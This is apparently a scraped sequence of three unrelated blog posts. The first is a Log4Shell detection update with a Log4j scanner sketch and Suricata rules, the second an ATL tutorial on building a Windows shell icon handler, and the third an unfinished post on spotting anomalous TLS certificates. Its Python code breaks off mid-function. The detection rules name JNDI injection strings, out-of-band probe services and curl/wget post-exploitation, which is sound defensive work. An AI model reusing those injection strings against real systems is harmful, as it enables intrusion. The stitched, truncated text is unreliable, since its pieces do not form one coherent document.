Ivanti informed us that communication was sent over the weekend to MobileIron Core customers. Ivanti has provided mitigation steps of the exploit listed below on their Knowledge Base. Both NCC Group and Ivanti recommend all customers immediately apply the mitigation within to ensure their environment is protected.
Update Tuesday December 14th, 13:00 UTC
Log4j-finder: finding vulnerable versions of Log4j on your systems
RIFT has published a Python 3 script that can be run on endpoints to check for the presence of vulnerable versions of Log4j. The script requires no dependencies and supports recursively checking the filesystem and inside JAR files to see if they contain a vulnerable version of Log4j. This script can be of great value in determining which systems are vulnerable, and where this vulnerability stems from. The script will be kept up to date with ongoing developments.
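The core idea can be sketched in a few lines of Python. This is a simplified illustration of the approach, not the actual log4j-finder script (which does considerably more, such as checking known class versions and nested archives):

```python
import os
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def find_jndi_jars(root):
    """Walk a directory tree and return the paths of JAR-like archives
    that bundle the JndiLookup class (the entry point for Log4Shell)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".jar", ".war", ".ear")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as jar:
                    if JNDI_CLASS in jar.namelist():
                        hits.append(path)
            except (zipfile.BadZipFile, OSError):
                continue  # skip unreadable or corrupt archives
    return hits
```

A host-based sweep like this finds copies of log4j that no network scan would ever reach, such as those in batch jobs or internal tools.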
It is strongly recommended to run host based scans for vulnerable Log4j versions. Whereas network-based scans attempt to identify vulnerable Log4j versions by attacking common entry points, a host-based scan can find Log4j in unexpected or previously unknown places.
The script can be found on GitHub: https://github.com/fox-it/log4j-finder
JNDI ExploitKit exposes larger attack surface
As shown by the release of an update JNDI ExploitKIT it is possible to reach remote code execution through serialized payloads instead of referencing a Java .class
object in LDAP and subsequently serving that to the vulnerable system. While TrustURLCodebase
defaults to false
in newer Java versions (6u211, 7u201, 8u191, and 11.0.1) and therefore prevents the LDAP reference vector, depending on the loaded libraries in the vulnerable application it is still possible to execute code through Java serialization via both RMI and LDAP.
Beware: Centralized logging can result in indirect compromise
This is also highly relevant for organisations using a form of centralised logging. Centralised logging can be used to collect and parse the received logs from the different services and applications running in the environment. We have identified cases where a Kibana server was not exposed to the Internet but because it received logs from several appliances it still got hit by the Log4Shell RCE and started to retrieve Java objects via LDAP.
We were unable to determine if this was due to Logstash being used in the background for parsing the received logs, but it underscores the importance of checking systems configured with centralised logging solutions for vulnerable versions of Log4j, rather than relying on the protection of newer JDK versions that have com.sun.jndi.ldap.object.trustURLCodebase and
com.sun.jndi.rmi.object.trustURLCodebase
set to false
by default.
A warning concerning possible post-exploitation
Although largely eclipsed by Log4Shell, last weekend also saw the emergence of details concerning two vulnerabilities (CVE-2021-42287
and CVE-2021-42278
) that reside in the Active Directory component of Microsoft Windows Server editions. Due to the nature of these vulnerabilities, an attacker could escalate their privileges in a relatively easy manner, and these vulnerabilities have already been weaponised.
It is therefore advised to apply the patches provided by Microsoft in the November 2021 security updates to every domain controller residing in the network, as these vulnerabilities are a possible form of post-exploitation after Log4Shell is successfully exploited.
Background
Since Log4j is used by many solutions, there are significant challenges in finding vulnerable systems and any potential compromise resulting from exploitation of the vulnerability. JNDI (Java Naming and Directory Interface) was designed to allow distributed applications to look up services in a resource-independent manner, and this is exactly where the bug enabling exploitation resides. The nature of JNDI allows for defense-evading exploitation attempts that are harder to detect through signatures. An additional problem is the tremendous amount of scanning activity currently ongoing. Because of this, investigating every single exploitation attempt is in most situations unfeasible. This means that distinguishing scanning attempts from actual successful exploitation is crucial.
In order to provide detection coverage for CVE-2021-44228, NCC Group’s RIFT first created a ruleset that covers as many ways of attempted exploitation of the vulnerability as possible. This initial coverage allowed the collection of threat intelligence for further investigation. Most adversaries appear to use a different IP to scan for the vulnerability than the one on which they listen for incoming victim machines. IOCs for listening IPs / domains are therefore more valuable than those of scanning IPs: after all, a connection from an environment to a known listening IP might indicate a successful compromise, whereas a connection to a scanning IP might merely mean that the environment has been scanned.
After establishing this initial coverage, our focus shifted to detecting successful exploitation in real time. This can be done by monitoring for rogue JRMI or LDAP requests to external servers. Preferably, this sort of behavior is detected in a port-agnostic way, as attackers may choose arbitrary ports to listen on. Moreover, a full RCE chain currently requires the victim machine to retrieve a Java class file from a remote server (caveat: unless the goal is only exfiltrating sensitive environment variables). For hunting purposes we can therefore hunt for inbound Java classes. And if coverage exists for incoming attacks, we can also alert on an inbound Java class arriving within a short period after an exploitation attempt: the combination of an inbound exploitation attempt and an inbound Java class is a high-confidence indicator that a successful connection has occurred.
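The inbound-class heuristic relies on the fact that every compiled Java class file starts with the magic bytes CA FE BA BE. A minimal sketch of that check (the helper name is ours; the Suricata rules below implement the same idea on the wire):

```python
# A compiled Java class file always begins with the magic bytes CA FE BA BE.
JAVA_CLASS_MAGIC = bytes.fromhex("cafebabe")

def looks_like_java_class(payload: bytes, depth: int = 40) -> bool:
    # Mirror the rule's depth constraint: the magic must occur within the
    # first `depth` bytes of the stream, not just anywhere in the payload.
    return JAVA_CLASS_MAGIC in payload[:depth]
```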
The remainder of this blogpost is twofold: we first provide a set of Suricata rules that can be used for:
- Detecting incoming exploitation attempts;
- Alerting on higher confidence indicators that successful exploitation has occurred;
- Generating alerts that can be used for hunting.
After these detection rules, a list of IOCs is provided.
Detection Rules
Some of these rules are redundant, as they’ve been written in rapid succession.
# Detects Log4j exploitation attempts
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:ldap://"; fast_pattern:only; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003726; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; pcre:"/\$\{jndi\:(rmi|ldaps|dns)\:/"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003728; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; content:!"ldap://"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, twitter.com/stereotype32/status/1469313856229228544; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003730; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228)"; flow:established, to_server; content:"%7bjndi:"; nocase; fast_pattern; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003731; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header"; flow:established, to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003732; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI"; flow:established,to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003733; rev:1;)
# Better and stricter rules, also detects evasion techniques
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header (strict)"; flow:established,to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Hi; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003734; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI (strict)"; flow:established, to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Ui; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003735; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in Client Body (strict)"; flow:to_server; content:"${"; http_client_body; fast_pattern; content:"}"; http_client_body; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Pi; flowbits:set, fox.apachelog4j.rce.strict; xbits:set,fox.log4shell.attempt,track ip_dst,expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-12; metadata:ids suricata; priority:3; sid:21003744; rev:1;)
Detecting outbound connections to probing services
Connections to probing services could indicate that a system in your network has been scanned and has subsequently connected back to a listening service, which in turn suggests that the system is, or was, vulnerable.
# Possible successful interactsh probe
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"FOX-SRT – Webattack – Possible successful InteractSh probe observed"; flow:established, to_client; content:"200"; http_stat_code; content:"<html><head></head><body>"; http_server_body; fast_pattern; pcre:"/[a-z0-9]{30,36}<\/body><\/html>/QR"; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:misc-attack; reference:url, github.com/projectdiscovery/interactsh; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003712; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – DNS query for interactsh.com server observed"; flow:stateless; dns_query; content:".interactsh.com"; fast_pattern; pcre:"/[a-z0-9]{30,36}\.interactsh\.com/"; threshold:type limit, track by_src, count 1, seconds 3600; reference:url, github.com/projectdiscovery/interactsh; classtype:bad-unknown; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003713; rev:1;)
# Detecting DNS queries for dnslog[.]cn
alert dns any any -> any 53 (msg:"FOX-SRT – Suspicious – dnslog.cn DNS Query Observed"; flow:stateless; dns_query; content:"dnslog.cn"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-12-10; metadata:ids suricata; priority:2; sid:21003729; rev:1;)
# Connections to requestbin.net
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – requestbin.net DNS Query Observed"; flow:stateless; dns_query; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003685; rev:1;)
alert tls $HOME_NET any -> $EXTERNAL_NET 443 (msg:"FOX-SRT – Suspicious – requestbin.net in SNI Observed"; flow:established, to_server; tls_sni; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003686; rev:1;)
Detecting possible successful exploitation
Outbound LDAP(S) / RMI connections are highly uncommon but can be caused by successful exploitation. An inbound Java class can also be suspicious, especially if it arrives shortly after an exploitation attempt.
# Detects possible successful exploitation of Log4j
# JNDI LDAP/RMI Request to External
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JNDI LDAP Bind to External Observed (CVE-2021-44228)"; flow:established, to_server; dsize:14; content:"|02 01 03 04 00 80 00|"; offset:7; isdataat:!1, relative; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; metadata:created_at 2021-12-11; sid:21003738; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JRMI Request to External Observed (CVE-2021-44228)"; flow:established, to_server; content:"JRMI"; depth:4; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; reference:url, https://docs.oracle.com/javase/9/docs/specs/rmi/protocol.html; metadata:created_at 2021-12-11; sid:21003739; rev:1;)
# Detecting inbound java shortly after exploitation attempt
alert tcp any any -> $HOME_NET any (msg: "FOX-SRT – Exploit – Java class inbound after CVE-2021-44228 exploit attempt (xbit)"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:40; fast_pattern; xbits:isset, fox.log4shell.attempt, track ip_dst; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:successful-user; priority:1; metadata:ids suricata; metadata:created_at 2021-12-12; sid:21003741; rev:1;)
Hunting rules (can yield false positives)
Wget and cURL requests to external hosts were observed being used by an actor for post-exploitation. As cURL and Wget are also used legitimately, these rules should be used for hunting purposes only. Also note that attackers can easily change the User-Agent, although we have not seen that in the wild yet. Outgoing connections after Log4j exploitation attempts can also be tracked for later hunting, although this rule can generate false positives if the victim machine makes outgoing connections regularly. Lastly, detecting inbound compiled Java classes can be used for hunting as well.
# Outgoing connection after Log4j Exploit Attempt (uses xbit from sid: 21003734) – requires `stream.inline=yes` setting in suricata.yaml for this to work
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Suspicious – Possible outgoing connection after Log4j Exploit Attempt"; flow:established, to_server; xbits:isset, fox.log4shell.attempt, track ip_src; stream_size:client, =, 1; stream_size:server, =, 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:bad-unknown; metadata:ids suricata; metadata:created_at 2021-12-12; priority:3; sid:21003740; rev:1;)
# Detects inbound Java class
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "FOX-SRT – Suspicious – Java class inbound"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:20; fast_pattern; threshold:type limit, track by_dst, count 1, seconds 43200; metadata:ids suricata; metadata:created_at 2021-12-12; classtype:bad-unknown; priority:3; sid:21003742; rev:2;)
Indicators of Compromise
This list contains domains and IPs that have been observed to listen for incoming connections. Unfortunately, some adversaries scan and listen from the same IP, generating a lot of noise that can make threat hunting more difficult. Moreover, as security researchers are scanning the internet for the vulnerability as well, it is possible that an IP or domain listed here is only listening for benign purposes.
References
General references
- Fox-IT / NCC Group actively participates in a continuously updated reddit thread: https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Known vulnerable services / products which use log4j:
- https://github.com/YfryTchsGD/Log4jAttackSurface
- https://mvnrepository.com/artifact/log4j/log4j/usages
Icon Handler with ATL
One of the exercises I gave at the recent COM Programming class was to build an Icon Handler that integrates with the Windows Shell, where DLLs should have an icon based on their “bitness” – whether they’re 64-bit or 32-bit Portable Executable (PE).
The Shell provides many opportunities for extensibility. An Icon Handler is one of the simplest, but still requires writing a full-fledged COM component that implements certain interfaces that the shell expects. Here is the result of using the Icon Handler DLL, showing the folders c:\Windows\System32 and c:\Windows\SysWow64 (large icons for easier visibility).
Let’s see how to build such an icon handler. The full code is at zodiacon/DllIconHandler.
The first step is to create a new ATL project in Visual Studio. I’ll be using Visual Studio 2022, but any recent version would work essentially the same way (e.g. VS 2019, or 2017). Locate the ATL project type by searching in the terrible new project dialog introduced in VS 2019 and still horrible in VS 2022.
ATL (Active Template Library) is certainly not the only way to build COM components. “Pure” C++ would work as well, but ATL provides all the COM boilerplate such as the required exported functions, class factories, IUnknown implementations, etc. Since ATL is fairly “old”, it lacks the elegance of other libraries such as WRL and WinRT, as it doesn’t take advantage of C++11 and later features. Still, ATL has withstood the test of time, is robust, and is full-featured when it comes to COM, something I can’t say for these other alternatives.
If you can’t locate the ATL project, you may not have ATL installed properly. Make sure the C++ Desktop development workload is installed using the Visual Studio Installer.
Click Next and select a project name and location:
Click Create to launch the ATL project wizard. Leave all defaults (Dynamic Link Library) and click OK. Shell extensions of all kinds must be DLLs, as these are loaded by Explorer.exe. It’s not ideal in terms of Explorer’s stability, as an unhandled exception can bring down the entire process, but this is necessary to get good performance, as no inter-process calls are made.
Two projects are created, named DllIconHandler and DllIconHandlerPS. The latter is a proxy/stub DLL that may be useful if cross-apartment COM calls are made. This is not needed for shell extensions, so the PS project should simply be removed from the solution.
A detailed discussion of COM is way beyond the scope of this post.
The remaining project contains the required COM DLL code, such as the mandatory exported function, DllGetClassObject, and the other optional but recommended exports (DllRegisterServer, DllUnregisterServer, DllCanUnloadNow and DllInstall). This is one of the nice benefits of working with an ATL project for COM component development: all the COM boilerplate is implemented by ATL.
The next step is to add a COM class that will implement our icon handler. Again, we’ll turn to a wizard provided by Visual Studio that provides the fundamentals. Right-click the project and select Add Item… (don’t select Add Class as it’s not good enough). Select the ATL node on the left and ATL Simple Object on the right. Set the name to something like IconHandler:
Click Add. The ATL New Object wizard opens up. The name typed in the Add New Item dialog is used as a basis for generating names for source code elements (like the C++ class) and COM elements (that would be written into the IDL file and the resulting type library). Since we’re not going to define a new interface (we need to implement explorer-defined interfaces), there is no real need to tweak anything. You can click Finish to generate the class.
Three files are added with this last step: IconHandler.h, IconHandler.cpp and IconHandler.rgs. The C++ source files’ role is obvious: implementing the icon handler. The rgs file contains a script in an ATL-provided “language” indicating what information to write to the Registry when this DLL is registered (and what to remove if it’s unregistered).
The IDL (Interface Definition Language) file has also been modified, adding the definitions of the wizard generated interface (which we don’t need) and the coclass. We’ll leave the IDL alone, as we do need it to generate the type library of our component because the ATL registration code uses it internally.
If you look in IconHandler.h, you’ll see that the class implements the empty IIconHandler interface generated by the wizard that we don’t need. It even derives from IDispatch:
class ATL_NO_VTABLE CIconHandler :
    public CComObjectRootEx<CComSingleThreadModel>,
    public CComCoClass<CIconHandler, &CLSID_IconHandler>,
    public IDispatchImpl<IIconHandler, &IID_IIconHandler, &LIBID_DLLIconHandlerLib, /*wMajor =*/ 1, /*wMinor =*/ 0> {
We can leave the IDispatchImpl-inheritance, since it’s harmless. But it’s useless as well, so let’s delete it, and also delete the interfaces IIconHandler and IDispatch from the interface map located further down:
class ATL_NO_VTABLE CIconHandler :
    public CComObjectRootEx<CComSingleThreadModel>,
    public CComCoClass<CIconHandler, &CLSID_IconHandler> {
public:
    BEGIN_COM_MAP(CIconHandler)
    END_COM_MAP()
(I have rearranged the code a bit). Now we need to add the interfaces we truly have to implement for an icon handler: IPersistFile and IExtractIcon. To get their definitions, we’ll add an #include for <shlobj_core.h> (this is documented in MSDN). We add the interfaces to the inheritance hierarchy and the COM interface map, and use the Visual Studio feature to add the interface members for us by right-clicking the class name (CIconHandler), pressing Ctrl+. (dot) and selecting Implement all pure virtuals of CIconHandler. The resulting class header looks something like this (some parts omitted for clarity; I have also removed the virtual keyword, as it’s inherited and doesn’t have to be specified in derived types):
class ATL_NO_VTABLE CIconHandler :
    public CComObjectRootEx<CComSingleThreadModel>,
    public CComCoClass<CIconHandler, &CLSID_IconHandler>,
    public IPersistFile,
    public IExtractIcon {
public:
    BEGIN_COM_MAP(CIconHandler)
        COM_INTERFACE_ENTRY(IPersistFile)
        COM_INTERFACE_ENTRY(IExtractIcon)
    END_COM_MAP()

    //...

    // Inherited via IPersistFile
    HRESULT __stdcall GetClassID(CLSID* pClassID) override;
    HRESULT __stdcall IsDirty(void) override;
    HRESULT __stdcall Load(LPCOLESTR pszFileName, DWORD dwMode) override;
    HRESULT __stdcall Save(LPCOLESTR pszFileName, BOOL fRemember) override;
    HRESULT __stdcall SaveCompleted(LPCOLESTR pszFileName) override;
    HRESULT __stdcall GetCurFile(LPOLESTR* ppszFileName) override;

    // Inherited via IExtractIconW
    HRESULT __stdcall GetIconLocation(UINT uFlags, PWSTR pszIconFile, UINT cchMax, int* piIndex, UINT* pwFlags) override;
    HRESULT __stdcall Extract(PCWSTR pszFile, UINT nIconIndex, HICON* phiconLarge, HICON* phiconSmall, UINT nIconSize) override;
};
Now for the implementation. The IPersistFile interface seems non-trivial, but fortunately we just need to implement the Load method for an icon handler. This is where we get the file name we need to inspect. To check whether a DLL is 64 or 32 bit, we’ll add a simple enumeration and a helper function to the CIconHandler class:
enum class ModuleBitness {
    Unknown,
    Bit32,
    Bit64
};

static ModuleBitness GetModuleBitness(PCWSTR path);
The implementation of IPersistFile::Load looks something like this:
HRESULT __stdcall CIconHandler::Load(LPCOLESTR pszFileName, DWORD dwMode) {
    ATLTRACE(L"CIconHandler::Load %s\n", pszFileName);
    m_Bitness = GetModuleBitness(pszFileName);
    return S_OK;
}
The method receives the full path of the DLL we need to examine. How do we know that only DLL files will be delivered? This has to do with the registration we’ll make for the icon handler: we’ll register it for the DLL file extension only, so that other file types will not be provided. Calling GetModuleBitness (shown later) performs the real work of determining the DLL’s bitness and stores the result in m_Bitness (a data member of type ModuleBitness).
All that’s left to do is tell Explorer which icon to use. This is the role of IExtractIcon. The Extract method can be used to provide an icon handle directly, which is useful if the icon is “dynamic”, perhaps generated by different means in each case. In this example, we just need to return one of two icons which have been added as resources to the project (you can find those in the project source code; this is also an opportunity to provide your own icons).
For our case, it’s enough to return S_FALSE from Extract, which causes Explorer to use the information returned from GetIconLocation. Here is its implementation:
HRESULT __stdcall CIconHandler::GetIconLocation(UINT uFlags, PWSTR pszIconFile, UINT cchMax, int* piIndex, UINT* pwFlags) {
    if (s_ModulePath[0] == 0) {
        ::GetModuleFileName(_AtlBaseModule.GetModuleInstance(), s_ModulePath, _countof(s_ModulePath));
        ATLTRACE(L"Module path: %s\n", s_ModulePath);
    }
    if (s_ModulePath[0] == 0)
        return S_FALSE;
    if (m_Bitness == ModuleBitness::Unknown)
        return S_FALSE;

    wcscpy_s(pszIconFile, wcslen(s_ModulePath) + 1, s_ModulePath);
    ATLTRACE(L"CIconHandler::GetIconLocation: %s bitness: %d\n", pszIconFile, m_Bitness);
    *piIndex = m_Bitness == ModuleBitness::Bit32 ? 0 : 1;
    *pwFlags = GIL_PERINSTANCE;
    return S_OK;
}
The method’s purpose is to return the current module’s path (our icon handler DLL) and the icon index to use. This information is enough for Explorer to load the icon itself from the resources. First, we get the module path of where our DLL has been installed. Since this doesn’t change, it’s only retrieved once (with GetModuleFileName) and stored in a static variable (s_ModulePath).
If this fails (unlikely), or the bitness could not be determined (maybe the file was not a PE at all, but just had such an extension), then we return S_FALSE. This tells Explorer to use the default icon for the file type (DLL). Otherwise, we store 0 or 1 in piIndex, based on the IDs of the icons (0 corresponds to the lower of the IDs).
Finally, we need to set a flag inside pwFlags to indicate to Explorer that this icon extraction is required for every file (GIL_PERINSTANCE). Otherwise, Explorer calls IExtractIcon just once for any DLL file, which is the opposite of what we want.
The final piece of the puzzle (in terms of code) is how to determine whether a PE is 64 or 32 bit. This is not the point of this post, as any custom algorithm can be used to provide different icons for different files of the same type. For completeness, here is the code with comments:
CIconHandler::ModuleBitness CIconHandler::GetModuleBitness(PCWSTR path) {
    auto bitness = ModuleBitness::Unknown;
    //
    // open the DLL as a data file
    //
    auto hFile = ::CreateFile(path, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hFile == INVALID_HANDLE_VALUE)
        return bitness;

    //
    // create a memory mapped file to read the PE header
    //
    auto hMemMap = ::CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, 0, nullptr);
    ::CloseHandle(hFile);
    if (!hMemMap)
        return bitness;

    //
    // map the first page (where the header is located)
    //
    auto p = ::MapViewOfFile(hMemMap, FILE_MAP_READ, 0, 0, 1 << 12);
    if (p) {
        //
        // ImageNtHeader is declared in <DbgHelp.h> (link with Dbghelp.lib)
        //
        auto header = ::ImageNtHeader(p);
        if (header) {
            auto machine = header->FileHeader.Machine;
            bitness = header->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC ||
                machine == IMAGE_FILE_MACHINE_AMD64 || machine == IMAGE_FILE_MACHINE_ARM64
                ? ModuleBitness::Bit64 : ModuleBitness::Bit32;
        }
        ::UnmapViewOfFile(p);
    }
    ::CloseHandle(hMemMap);
    return bitness;
}
To make all this work, there is still one more concern: registration. Normal COM registration is necessary (so that the call to CoCreateInstance issued by Explorer has a chance to succeed), but not enough. Another registration is needed to let Explorer know that this icon handler exists, and is to be used for files with the extension “DLL”.
Fortunately, ATL provides a convenient mechanism to add Registry settings using a simple script-like configuration, which does not require any code. The added keys/values have been placed in DllIconHandler.rgs like so:
HKCR {
    NoRemove DllFile {
        NoRemove ShellEx {
            IconHandler = s '{d913f592-08f1-418a-9428-cc33db97ed60}'
        }
    }
}
This sets an icon handler in HKEY_CLASSES_ROOT\DllFile\ShellEx, where the IconHandler value specifies the CLSID of our component. You can find the CLSID in the IDL file where the coclass element is defined:
[
    uuid(d913f592-08f1-418a-9428-cc33db97ed60)
]
coclass IconHandler {
Replace with your own CLSID if you’re building this project from scratch. Registration itself is done with the RegSvr32 built-in tool. With an ATL project, a successful build also causes RegSvr32 to be invoked on the resulting DLL, thus performing registration. The default behavior is to register in HKEY_CLASSES_ROOT, which uses HKEY_LOCAL_MACHINE behind the covers. This requires running Visual Studio elevated (or an elevated command window if called from outside VS). It will register the icon handler for all users on the machine. If you prefer to register for the current user only (which uses HKEY_CURRENT_USER and does not require running elevated), you can set per-user registration in VS by going to project properties, clicking on the Linker element and setting per-user redirection:
If you’re registering from outside VS, the per-user registration is achieved with:
regsvr32 /n /i:user <dllpath>
This is it! The full source code is available here.
zodiacon
Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm
Author: Margit Hazenbroek
tl;dr
An approach to detecting suspicious TLS certificates using an incremental anomaly detection model is discussed. This model utilizes the Half-Space-Trees algorithm and provides our Security Operations Center (SOC) teams with the opportunity to detect suspicious behavior, in real time, even when network traffic is encrypted.
The prevalence of encrypted traffic
As a company that provides Managed Network Detection & Response services, we have observed an increase in the use of encrypted traffic. This trend is broadly welcome. The use of encrypted network protocols yields improved mitigation against eavesdropping. However, in an attempt to bypass security detection that relies on deep packet inspection, it is now a standard tactic for malicious actors to abuse the privacy that encryption enables. For example, when conducting malicious activity, such as command and control of an infected device, connections to the attacker-controlled external domain now commonly occur over HTTPS.
The application of a range of data science techniques is now integral to identifying malicious activity that is conducted using encrypted network protocols. This blogpost expands on one such technique: how anomalous characteristics of TLS certificates can be identified using the Half-Space-Trees algorithm. In combination with other modelling, such as the identification of an unusual JA3 hash [i], beaconing patterns [ii] or randomly generated domains [iii], effective detection logic can be created. The research described here has since been further developed, added to our commercial offering, and is actively facilitating real-time detection of malicious activity.
Malicious actors abuse the trust of TLS certificates
TLS certificates are a type of digital certificate, issued by a Certificate Authority (CA) certifying that they have verified the owners of the domain name which is the subject of the certificate. TLS certificates usually contain the following information:
- The subject domain name
- The subject organization
- The name of the issuing CA
- Additional or alternative subject domain names
- Issue date
- Expiry date
- The public key
- The digital signature by the CA [iv].
If malicious actors want to use TLS so that their traffic appears legitimate, they have to obtain a TLS certificate (Mitre, T1608.003) [v]. Malicious actors can obtain certificates in different ways, most commonly by:
- Obtaining free certificates from a CA. CA’s like Let’s Encrypt issue free certificates. Malicious actors are known to widely abuse this trust relationship (vi, vii).
- Creating self-signed certificates. Self-signed certificates are not signed by a CA. Certain attack frameworks such as Cobalt Strike offer the option to generate self-signed certificates.
- Buying or stealing certificates from a CA. For example, malicious actors can deceive a CA into issuing a certificate for a fake organization.
The following example shows the subject name and issue name of a TLS certificate in a recent Ryuk ransomware campaign.
Subject Name:
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com
Issuer Name:
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com
Example 1. Subject and issuer fields in a TLS certificate used in Ryuk ransomware
The meaning of the attributes that can be found in the issuer name and subject name fields of TLS certificates are defined in RFC 5280 and are explained in the table below.
Attribute | Meaning
C | Country of the entity
ST | State or province
L | Locality
O | Organization name
OU | Organizational Unit
CN | Common Name
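For analysis, it helps to turn such subject/issuer strings into attribute dictionaries. A naive Python sketch (real RFC 4514 parsing also handles escaping; parse_dn is a hypothetical helper for illustration, not a product function):

```python
import re

# Attribute keys we expect in the subject/issuer strings shown above.
ATTR_KEYS = ("C", "ST", "L", "O", "OU", "CN")

def parse_dn(dn: str) -> dict:
    # Split only on commas that are immediately followed by a known key and
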